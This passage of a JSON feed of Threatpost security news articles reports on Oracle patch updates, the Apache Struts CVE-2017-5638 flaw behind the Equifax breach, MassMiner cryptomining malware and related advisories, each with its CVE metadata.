rise, with a 29 percent increase in 2017 compared to the previous year.\n\nThe[ patches come](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) just weeks after Oracle OpenWorld where Larry Ellison, co-founder, executive chairman and chief technology officer of Oracle, stressed the importance of security during his keynote. Ellison also used the occasion to stress the importance of software patching in light of the [recent Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nLast month, Oracle used an advisory as an opportunity to remind users that [in April it ](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>)fixed the Struts vulnerability (CVE-2017-5638) which was behind [Equifax\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>),\n\nOrganizations are falling down when it comes to patching their most important business-critical applications, Perez-Etchegoyen said.\n\nCiting a recent Ponemon Research study, Perez-Etchegoyen said fewer than half of the 600 respondents interviewed said they have a monthly plan to implement security patches for their Oracle EBS applications. Seventy percent believe it is likely their company would have a data breach due to insecure Oracle EBS applications that they have failed to secure or apply patches to.\n\nAlso part of Oracle\u2019s quarterly update are patches for its Java Platform, Standard Edition that received 22 new security fixes. Twenty of these vulnerabilities may be remotely exploitable without authentication, for example, they may be exploited over a network without requiring user credentials, Oracle said. The highest CVSS base score of vulnerabilities affecting Oracle Java SE is 9.6.\n\nImpacted are Java Advanced Management Console, Java SE, Java SE Embedded and JRockit.\n\nOracle Database Server received six security fixes with two of the vulnerabilities remotely exploitable without authentication. Affected Oracle Database Server components include Spatial (Apache Groovy), WLM (Apache Tomcat), Java VM, RDBMS Security, Core RDBMS and XML Database.\n", "cvss3": {}, "published": "2017-10-17T18:13:09", "type": "threatpost", "title": "Oracle Patches 250 Bugs in Quarterly Critical Patch Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10332", "CVE-2017-5638"], "modified": "2017-10-17T18:13:09", "id": "THREATPOST:0308A7143D92E14583CCD684912ABD67", "href": "https://threatpost.com/oracle-patches-250-bugs-in-quarterly-critical-patch-update/128484/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:48", "description": "Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also under public attack.\n\nIn all, Oracle admins have a tall order with 299 patches across most of the company\u2019s product lines; 162 of the vulnerabilities are remotely exploitable.\n\nTwo Solaris exploits were leaked by the mysterious ShadowBrokers last Friday. The Solaris attacks were included among a rash of other exploits including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday\u2019s dump.\n\nOne of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday. It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.\n\nResearcher Matthew Hickey of U.K. consultancy Hacker House, said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10, and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.\n\n> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (upto 9, still untested) <https://t.co/A3fC7BuwcK>\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)\n\n\u201cAs a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,\u201d Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, \u201ceven though the bug was a trivial path traversal for \u2018dtappgather\u2019 extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.\u201d\n\nSince last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. The Solaris attacks are of particular concern since these are the backbone of many enterprise-grade server environments.\n\n> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)\n\n\u201cThis vulnerability can be exploited remotely without authentication or any information about the targeted machine,\u201d said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). \u201cThese are very critical vulnerabilities.\u201d\n\nThe [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it\u2019s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker could upload a malicious Content-Type value and have it execute. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. For the most part, Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks were detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.\n\nOracle patched Struts 2 on 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.\n\n\u201cThat could be a little bit of a saving grace for some of these services,\u201d Qualys\u2019 Sarwate said. There could be some instances, however, where these apps are exposed to the public network for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. \u201cFor a normal admin, it could be a little difficult unless a vendor tells them these are the products you\u2019re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.\u201d\n\nWhile there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.\n\nThe previous record for quarterly Oracle patches was last July when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January\u2019s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).\n", "cvss3": {}, "published": "2017-04-19T07:20:09", "type": "threatpost", "title": "Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2017-04-21T19:31:17", "id": "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "href": "https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week\u2019s Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage with those claims over the weekend.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it\u2019s unclear which vulnerability, if any was exploited.\n\n[The letter,](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax\u2019s servers was breached via an unnamed Apache Struts flaw.\n\nThe report penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird &amp; Co, did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.\n\nGielen\u2019s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans\u2019 records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) \u2013 since edited \u2013 initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. Gielen said Saturday that since the breach was detected back in July, it\u2019s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.\n\nGielen says the ASF takes \u201cenormous efforts\u201d to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities. There is no silver bullet for preventing exploits from surfacing in the wild however.\n\n\u201cSince vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.\u201d\n\nIf the attackers had used CVE-2017-9805, it would have been considered a zero day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability \u2013 something it quickly remedied.\n\n\u201cWe were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,\u201d Gielen said, \u201cWhat we saw here is common software engineering business \u2014 people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. It\u2019s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.\u201d\n\nGielen concluded his letter with a series of best practices for businesses who use Apache Struts to follow, including being aware which framework/libraries are used in their setup, that processes to roll out security fixes are established, and perhaps most importantly, to understand that complex software can contain flaws.\n\nAn Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.\n\nIt\u2019s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework\u2019s REST plugin. Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from Struts\u2019 Jakarta Multipart parser upload functionality and allowed an attacker to execute requests to an Apache webserver. Researchers with Cisco Talos, [who found the bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.\n\nResearchers with Contrast Security posit it\u2019s more likely the attacker used CVE-2017-5638, an expression language injection vulnerability leveraged via the content-type header, to hit Equifax.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Jeff Williams, Contrast\u2019s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).\n\nWilliams echoed a few sentiments made by Gielen, including the fact that maintaining the security of libraries can be tricky but should remain a focus for businesses.\n\n\u201cKeeping libraries up to date isn\u2019t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months. I have recently talked with several large organizations that took over four months to deal with CVE-2017-5638,\u201d Williams said.\n\nEquifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage control mode.\n\nThe company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The response was presumably in response to a series of tweets that went viral on Friday night calling out Equifax for using hardcoded PINs that mirrored the date and time they were requested, a format the company allegedly has followed for more than a decade.\n\n> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.\n> \n> \u2014 Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)\n\nThe company said in an update to its site that going forward consumers placing a security freeze will be given a randomly generated PIN. Users who previously froze their credit will have to mail the company directly to change it, however.\n\n> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail. [pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)\n> \n> \u2014 Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)\n\nThe company on Monday also apologized for lengthy call center wait times and stressed that users who sign up for TrustedID Premier, the company\u2019s ID theft protection and credit monitoring service, will not be charged as soon as the year runs out.\n\nThe company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn\u2019t waive a consumer\u2019s right to take legal action.\n\nThe company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeated by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York\u2019s Attorney General, opened a formal investigation into the breach on Friday, calling out the company\u2019s arbitration clause policy.\n\nAs expected multiple lawsuits have been filed against the company in wake of the breach. One class action suit, filed late Thursday night, alleges Equifax \u201cnegligently failed to maintain adequate technological safeguards to protect [the plaintiffs\u2019] information from unauthorized access by hackers.\u201d The suit seeks as much as $70 billion in damages nationally.\n\n\u201cEquifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,\u201d the complaint also reads.\n\n_*This article was updated at 5 p.m. to include insight from Contrast Security re: CVE-2017-5638 and Equifax._\n", "cvss3": {}, "published": "2017-09-11T15:02:31", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-20T19:57:18", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "Equifax said the culprit behind [this summer\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.\n\nThe bug was widely assumed by experts to be the \u201cU.S. website application vulnerability\u201d implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn\u2019t applied patches for flaws discovered earlier this year.\n\nOn Wednesday company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.\n\n> \u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\u201d\n\nUntil the news broke on Wednesday there was still mounting confusion over which Struts vulnerability attackers used.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability. A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) but Gielen said the Apache PMC would have known about it if it was being exploited in July.\n\nAn internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. The analyst who penned the report failed to specify which vulnerability and neglected to state how he arrived at that conclusion however.\n\nJeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Williams wrote, adding on Thursday that he was familiar with several large organizations which took months to fix the bug.\n\n\u201cThe process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,\u201d Williams said.\n\nThe vulnerability, a flaw in the Jakarta Multipart parser upload function in Apache, allowed an attacker to make a maliciously crafted request to an Apache webserver. The vulnerability, which first surfaced on Chinese forums before it was discovered by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) but proof of concept exploit code quickly found its way into Metasploit. Public scans and attacks spiked immediately following disclosure of the vulnerability and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.\n\nFamed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and like IoT issues as of late [have necessitated](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested the only solution to preventing breaches like this from happening again is government intervention.\n\n\u201cBy regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,\u201d Schneier wrote, \u201cThey can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.\u201d\n\nFittingly, as if to get the ball rolling, on Wednesday U.S. Sen. Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company\u2019s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.\n\n\u201cThe volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,\u201d [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>), \u201cIn ways similar to the financial service industry\u2019s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.\u201d\n\nThe letter came a few days after members of the U.S. Senate Finance Committee, including Sen. Orrin Hatch (R-UT) and Ron Wyden (D-Ore.) sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.\n\n\u201cThe scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,\u201d the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.\n\nWhile the FTC doesn\u2019t typically comment on ongoing investigations the Commission did confirm Thursday afternoon because of the \u201cintense public interest\u201d and \u201cpotential impact of this matter,\u201d it was looking into the breach.\n\nEquifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week Argentinans may be implicated as well. Brian Krebs, who authors the site, claims he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden\u2019s employees, native Argentinans, discovered an Equifax portal for employees in Argentina that included their names, email addresses, and DNI \u2013 the Argentinian equivalent of a Social Security Number.\n\nThe site, according to Holden \u201cwas wide open, protected by perhaps the most easy-to-guess password combination ever: \u201cadmin/admin.\u201d Krebs claims the portal was disabled upon notifying Equifax\u2019s attorney and that the company is looking into how it may have been left unsecured.\n", "cvss3": {}, "published": "2017-09-14T16:00:34", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T13:01:13", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-04-25T05:49:59", "description": "Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin\u2019-somethin\u2019 to the mix. It targets Windows servers with a variety of recent and well-known exploits \u2013 all within a single executable.\n\nIn fact, MassMiner uses a veritable cornucopia of attacks: The [EternalBlue](<https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/>) National Security Agency hacking tool ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)), which it uses to install DoublePulsar and the Gh0st RAT backdoor to establish persistence; an exploit for the well-known Apache Struts flaw that led to the Equifax breach ([CVE-2017-5638](<http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html>)); and an exploit for Oracle\u2019s WebLogic Java application server ([CVE-2017-10271](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>)). It also uses the SQLck tool to gain brute-force access to Microsoft SQL Servers, and it even incorporates a fork of MassScan, a legitimate tool that can scan the internet in under six minutes.\n\n\u201cIt surprised us how many different exploits and hacking tools it leverages,\u201d said AlienVault researchers Chris Doman and Fernando Martinez, who analyzed the code.\n\nThey added that the malware family comprises many different versions, but they all spread first within the local network of its initial host, before attempting to propagate across the wider internet.\n\nAs for the anatomy of the attack, compromised Microsoft SQL Servers are first subjected to scripts that install MassMiner and disable a number of important security features and anti-virus protections.\n\nOnce the malware has been installed, it sets about mining for Monero and hooking up with a crypto-wallet and mining pool; it also connects with its C2 server for updates, and configures itself to infect other machines on the network. Meanwhile, a short VisualBasic script is used to deploy the malware to compromised Apache Struts servers, and it moves laterally by replicating itself like a worm. MassScan meanwhile passes a list of both private and public IP ranges to scan during execution, to find fresh server targets out on the web that it can break into with the SQLck brute-force tool.\n\nSo far, the criminals behind the malware have been successful with this kitchen-sink approach: AlienVault in its [analysis](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>) identified two Monero wallets belonging to the attackers.\n\nThe success is unsurprising, according to Ruchika Mishra, director of products and solutions at Balbix.\n\n\u201cGiven [the workforce skills shortage], it\u2019s not hard to imagine a multi-pronged attack such as MassMiner bypassing security systems and staying under the radar with relative ease,\u201d Mishra said via email. \u201cWith the proliferation of coin-mining attacks in 2017 and 2018, I foresee continued innovation and a significant uptick in complexity as the barrier to entry for attackers lowers and iterations of successful exploits become more readily available on the Dark Web.\u201d\n\nWorryingly, other capabilities in the bad code suggest that MassMiner may have loftier goals than simply cryptomining. On the EternalBlue front, it uses the exploit to drop the [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) Windows kernel attack, which is a sophisticated memory-based payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish, giving them full control over the system.\n\nMassMiner also uses EternalBlue to install [Gh0st RAT](<https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/>), a trojan backdoor for persistence that has targeted the Windows platform for years. It was once primarily a nation-state tool used in APT espionage attacks against government agencies, activists and other political targets, until the EternalBlue exploit was used to spread it in other contexts last year.\n\nIncidentally, this is not the only cryptomining malware to make use of the ShadowBrokers\u2019 [release](<https://threatpost.com/shadowbrokers-remain-an-enigma/127072/>) of a trove of NSA exploits. Last week, [a malware called PyRoMine](<https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/>) that uses the EternalRomance tool was found in the wild mining Monero. Like MassMiner, it has far-ranging and concerning capabilities: It sets up a hidden default account on the victimized machine with system administrator privileges, which can be used for re-infection and further attacks.\n\nThe multi-pronged approach may be unusual, but it showcases the increasingly complex task that businesses have in front of them when it comes to their security postures.\n\n\u201cThe enterprise attack surface is hyper-dimensional and constantly increasing with hundreds of attack vectors. Enterprises continue to struggle with not just mapping their attack surfaces, but also identifying which systems are easiest to attack and can be used as a launch point for a breach,\u201d said Mishra.\n", "cvss3": {}, "published": "2018-05-03T20:26:37", "type": "threatpost", "title": "MassMiner Takes a Kitchen-Sink Approach to Cryptomining", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0143", "CVE-2017-10271", "CVE-2017-5638"], "modified": "2018-05-03T20:26:37", "id": "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "href": "https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-10-30T07:20:19", "description": "The Apache Software Foundation warned in an advisory that the latest version of the Commons FileUpload library is susceptible to a two-year-old remote code execution flaw. Users of the vulnerable library must update their projects manually.\n\nThe critical bug in Commons FileUpload library is a known vulnerability ([CVE-2016-1000031](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>)) that enables remote code execution in the open-source framework, which facilitates developing web applications in the Java programming language.\n\nEssentially a Java Object exists in the Apache Commons FileUpload library that can be manipulated so that when it is deserialized, it can write or copy files to disk in arbitrary locations.\n\n\u201cA remote attacker could exploit this vulnerability to take control of an affected system,\u201d according to the Monday [advisory](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>). \u201cYour project is affected if it uses the built-in file upload mechanism of Struts 2, which defaults to the use of commons-fileupload. The updated commons-fileupload library is a drop-in replacement for the vulnerable version. Deployed applications can be hardened by replacing the commons-fileupload jar file in WEB-INF/lib with the fixed jar.\u201d\n\nThe vulnerable commons-fileupload library is used in Apache Struts versions 2.3.36 and prior, the Foundation said in a Monday advisory. They urged users to upgrade to the latest released version of Commons FileUpload library \u2013 which is 1.3.3.\n\nThe vulnerability is reminiscent of [CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>), another critical remote code execution Apache vulnerability behind the massive 2017 Equifax breach that led to the compromise of 143 million Americans\u2019 data.\n\nWhile that Apache Struts vulnerability (impacting the Jakarta based file upload Multipart parser) was patched back in March 2017, the consumer credit reporting agency didn\u2019t apply patches for two months after the flaw\u2019s disclosure \u2013 eventually leading to the groundbreaking breach.\n\nSimilarly, this latest deserialization vulnerability was disclosed and patched in commons-fileupload in [March,](<https://issues.apache.org/jira/browse/FILEUPLOAD-279>) but since then a new version of Struts that became available \u2013 the 2.3.36 version, which was released in October \u2013 has touted vulnerable versions of the library.\n\nStruts versions from 2.5.12 are not affected, as this newer version of Struts includes a patched commons-fileupload component.\n\nUsers can fix the risk by replacing the faulty library manually.\n\n\u201cThere is no simple \u2018new Struts version\u2019 to fix this,\u201d said Johannes Ullrich, dean of research at the SANS Institute, in a blog [post](<https://isc.sans.edu/diary/rss/24278>) on Monday. \u201cYou will have to swap out the commons-fileupload library manually.\u201d\n\n\u201cAnd while you are at it: Double check that you don\u2019t have any other copies of the vulnerable library sitting on your systems,\u201d he added. \u201cStruts isn\u2019t the only one using it, and others may have neglected to update it as well.\u201d\n\nIt is only the latest security issue to afflict Apache Struts \u2013 earlier in August for instance, a critical remote code-execution vulnerability in Apache Struts 2 was [disclosed](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>).\n", "cvss3": {}, "published": "2018-11-06T12:27:15", "type": "threatpost", "title": "Apache Struts Warns Users of Two-Year-Old Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1000031", "CVE-2017-5638", "CVE-2019-11043"], "modified": "2018-11-06T12:27:15", "id": "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "href": "https://threatpost.com/apache-struts-warns-users-of-two-year-old-vulnerability/138820/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-13T21:58:43", "description": "The Panda threat group, best known for launching the widespread and successful 2018 [\u201cMassMiner\u201d cryptomining malware](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>) campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.\n\nWhile considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services. So far, researchers estimate that Panda has made away with more than $100,000 in Monero \u2013 and with attacks as recently as August 2019, the threat group isn\u2019t ceasing its activities anytime soon, they said.\n\n\u201cPanda\u2019s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information,\u201d said Christopher Evans and David Liebenberg with [Cisco\u2019s Talos research team.](<https://blog.talosintelligence.com/2019/09/panda-evolution.html>)\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers first became aware of Panda in the summer of 2018 after they engaged in a widespread illicit mining campaign called \u201c[MassMiner](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>).\u201d During that campaign, the threat actor used MassScan, a legitimate port scanner, to sniff out various vulnerabilities in servers to exploit, including a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and a remote code execution vulnerability in Apache Struts 2 